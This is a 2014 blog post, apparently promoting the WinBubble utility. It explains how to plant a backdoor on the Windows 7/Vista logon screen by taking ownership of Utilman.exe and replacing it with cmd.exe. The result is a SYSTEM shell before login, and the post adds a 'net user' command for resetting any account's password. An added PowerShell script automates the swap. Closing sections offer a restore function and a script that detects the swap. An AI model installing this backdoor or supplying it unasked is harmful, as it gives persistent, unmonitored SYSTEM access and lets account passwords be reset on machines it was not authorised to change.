Sunday, December 14, 2014

Hidden Backdoor in Windows 7/Vista Welcome Screen

OK, this is fun. Have any of you watched the 1995 movie "The Net", starring Sandra Bullock? The Praetorians' pi symbol in that film was a backdoor into password-protected sites. Can we create something like that in Windows Vista or 7? Yes, you can! How?
The clue: the Ease of Access button on the Welcome Screen.

Where? The key is the 624 KB Utilman.exe in the System32 folder. It is the program the Welcome Screen starts when you click the Ease of Access button, and it starts before anyone has logged on.
Steps:
Open the folder Windows\System32 and check the Properties of Utilman.exe.
Problem... Neither my current logon user, Lawrence, nor the Administrators group has permission to modify the file: it is a protected system file owned by TrustedInstaller, and Administrators only get Read & execute. So if you try to rename it, you get the message:
Destination Folder Access is Denied You need permission to perform this action
Normally, the WinBubble context menu entry "Take the Ownership of this file" can add the permission, but not for this file (the next version can do it easily). Most of the buttons on the Security tab are disabled as well.
How to Add the permission
Prevention is better than cure: so you can easily recover your system from any problem, create a restore point first, either from the context menu that WinBubble can create or manually: Win+R > rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4 > Create button > enter a name. (SystemPropertiesProtection.exe also opens the System Protection tab directly on Vista and 7.)
1. Take ownership of the file the long way: right-click the file > Properties > Security tab > Advanced > Owner tab > Edit, and set the owner to Administrators. Back on the Security tab, click Edit, select Administrators and check the Allow box for Full control.
Another way, since I know you are a geek: open Command Prompt as administrator (Start Search > type cmd > press Ctrl+Shift+Enter) and enter the following commands:
a. takeown /f "Directory\File"

e.g. takeown /f "c:\windows\system32\Utilman.exe"

b. icacls "Directory\File" /grant administrators:F

e.g.

icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
If you did not open cmd.exe as administrator, takeown fails with this message:
ERROR: The current logged on user does not have ownership privileges on the file (or folder) "c:\windows\system32\Utilman.exe" 
2. Rename Utilman.exe to anything as a backup, for example Utilman_old.exe.
3. Create a copy of cmd.exe (Ctrl+drag).
4. Rename the copy, cmd, to Utilman.
That's it!
5. Go to your Welcome Screen: Start Menu > click the right arrow at the bottom > Switch User, then click the blue Ease of Access button at the bottom-left of the screen.
You have now launched a Command Prompt running as SYSTEM, before anyone has logged on and with no UAC prompt to get in the way...
Doesn't work? Possible mistake: if "Hide extensions for known file types" is checked in Folder Options > View tab, Explorer adds the .exe for you, so rename the copy to "Utilman" only, not "Utilman.exe" (that would give you Utilman.exe.exe, which the Welcome Screen never starts).
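The same four steps as a script, together with the undo, as an added example that is not part of the original post or of WinBubble. It assumes the default %SystemRoot% and the backup name Utilman_old.exe used above, and must be run from an elevated PowerShell.

```powershell
# Added example, not from the original post or from WinBubble.
# Scripted version of steps 1-4 plus the undo. Run from an elevated PowerShell.
# Assumptions: default %SystemRoot%, and the backup name Utilman_old.exe used in the post.
$sys32   = Join-Path $env:SystemRoot 'System32'
$utilman = Join-Path $sys32 'Utilman.exe'
$backup  = Join-Path $sys32 'Utilman_old.exe'
$cmdExe  = Join-Path $sys32 'cmd.exe'

function Install-UtilmanShell {
    if (Test-Path $backup) { throw "Backup already exists at $backup; refusing to run twice." }
    # Step 1: the file is owned by TrustedInstaller, so first take ownership,
    # then grant Administrators Full Control (the same two commands as in the post).
    & takeown.exe /f $utilman | Out-Null
    & icacls.exe $utilman /grant 'Administrators:F' | Out-Null
    # Step 2: keep the original under the backup name.
    Rename-Item -Path $utilman -NewName 'Utilman_old.exe'
    # Steps 3 and 4: a copy of cmd.exe takes its place. Copy-Item writes the full
    # file name, so the "hidden extensions" mistake from the post cannot happen here.
    Copy-Item -Path $cmdExe -Destination $utilman
}

function Restore-Utilman {
    if (-not (Test-Path $backup)) { throw "No backup at $backup; nothing to restore." }
    # The swapped-in copy inherits the directory ACL; own it before deleting it.
    & takeown.exe /f $utilman | Out-Null
    & icacls.exe $utilman /grant 'Administrators:F' | Out-Null
    Remove-Item -Path $utilman -Force
    Rename-Item -Path $backup -NewName 'Utilman.exe'
    # Put the ACL back the way Windows Resource Protection expects it:
    # Administrators only Read & execute, owner TrustedInstaller.
    & icacls.exe $utilman /grant:r 'Administrators:RX' | Out-Null
    & icacls.exe $utilman /setowner 'NT SERVICE\TrustedInstaller' | Out-Null
}

# Usage (pick one):
#   Install-UtilmanShell
#   Restore-Utilman
```

Restore-Utilman matters more than it looks: a file that stays owned by Administrators with Full Control is exactly what an integrity check looks for, and sfc /scannow will put the original Utilman.exe back on its own because the file is protected by Windows Resource Protection.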
NEW! With the newest version of WinBubble you get this functionality in just a few clicks: click the Windows 7/Utilities tab, then the Logon Tools option.
Click Yes and restart your PC. Works great on Windows 7, 32- and 64-bit!
NOTE: You need to open the program again after restarting your computer and repeat the procedure to activate the feature.
SWEET!!! Start Hacking your own computer :)
Now it is fine for me to forget my password without creating a password reset disk, and without booting a Linux OS to clear the Vista password: I have a backdoor instead. From the SYSTEM prompt, resetting any local account is one command:
Net user [Username] [NewPassword]
Is this bad? Of course it is, if you use it that way.
Is this legal? Yes, it is... My steps need an administrator logon on that computer to create the backdoor. Doing it to somebody else's computer, for example by booting another OS like Linux to swap the file, is when it becomes illegal.
Type: whoami /all | more
Now we can see that the prompt is running as NT AUTHORITY\SYSTEM, the account the Welcome Screen itself runs under while you type your username and password.
Try typing taskmgr.exe (its Browse button gives you a mini Windows Explorer), notepad and even explorer.exe!
In my observations:
  • Windows Firewall is ON (great!)
  • Spyware and other malware protection is ON (great!)
  • User Account Control is OFF (nothing ever prompts: SYSTEM is not subject to UAC)
  • You can browse the Internet
  • The location of the Desktop: c:\Windows\System32\config\systemprofile\Desktop
  • You can launch Windows Media Player, Windows Calendar, Windows Mail and many more
Note: The guide above will possibly also work on the latest build (RC version) of Windows 7. Due to licence and other legal concerns I can't reveal any data. Tell me?
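As an added example (not part of the original post or of WinBubble), a check for the traces the procedure above leaves behind: a Utilman.exe with the same hash as cmd.exe, a version resource that says "Windows Command Processor", the owner and ACL changed in step 1, and the backup file. It assumes the default paths and the Utilman_old.exe name used in the post.

```powershell
# Added example, not from the original post or from WinBubble: does this machine
# have the swap described above? Checks the signs the procedure leaves behind.
# Assumptions: default %SystemRoot%; the stock cmd.exe FileDescription is
# "Windows Command Processor"; the backup name is the post's Utilman_old.exe.
$sys32   = Join-Path $env:SystemRoot 'System32'
$utilman = Join-Path $sys32 'Utilman.exe'
$cmdExe  = Join-Path $sys32 'cmd.exe'

function Get-Sha256Hex([string]$path) {
    # .NET hashing so this also runs on the PowerShell 2.0 that ships with Windows 7
    $sha   = [System.Security.Cryptography.SHA256]::Create()
    $bytes = $sha.ComputeHash([System.IO.File]::ReadAllBytes($path))
    return [System.BitConverter]::ToString($bytes).Replace('-', '')
}

function Test-UtilmanSwapped {
    $findings = @()

    # Steps 3 and 4 leave Utilman.exe byte-identical to cmd.exe
    if ((Get-Sha256Hex $utilman) -eq (Get-Sha256Hex $cmdExe)) {
        $findings += 'Utilman.exe is byte-identical to cmd.exe'
    }

    # The PE version resource says what the file really is
    $desc = (Get-Item $utilman).VersionInfo.FileDescription
    if ($desc -match 'Command Processor') {
        $findings += "FileDescription reads '$desc'"
    }

    # Step 1 moves ownership away from TrustedInstaller and grants Administrators Full Control
    $acl = Get-Acl -Path $utilman
    if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
        $findings += "Owner is '$($acl.Owner)', expected NT SERVICE\TrustedInstaller"
    }
    foreach ($ace in $acl.Access) {
        if ($ace.IdentityReference.Value -eq 'BUILTIN\Administrators' -and
            $ace.FileSystemRights -eq [System.Security.AccessControl.FileSystemRights]::FullControl) {
            $findings += 'BUILTIN\Administrators has Full Control on Utilman.exe'
        }
    }

    # The backup the post tells you to keep is itself a tell
    if (Test-Path (Join-Path $sys32 'Utilman_old.exe')) {
        $findings += 'Utilman_old.exe backup left in System32'
    }
    return $findings
}

$result = @(Test-UtilmanSwapped)
if ($result.Count -eq 0) { 'Utilman.exe looks untouched' } else { $result }
```

The built-in equivalent is sfc /verifyfile=C:\Windows\System32\Utilman.exe, which compares the file against the component store; the script above is only useful because it also tells you which of the steps was carried out and whether the backup was left behind.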
ENJOY LEARNING WINDOWS!!!
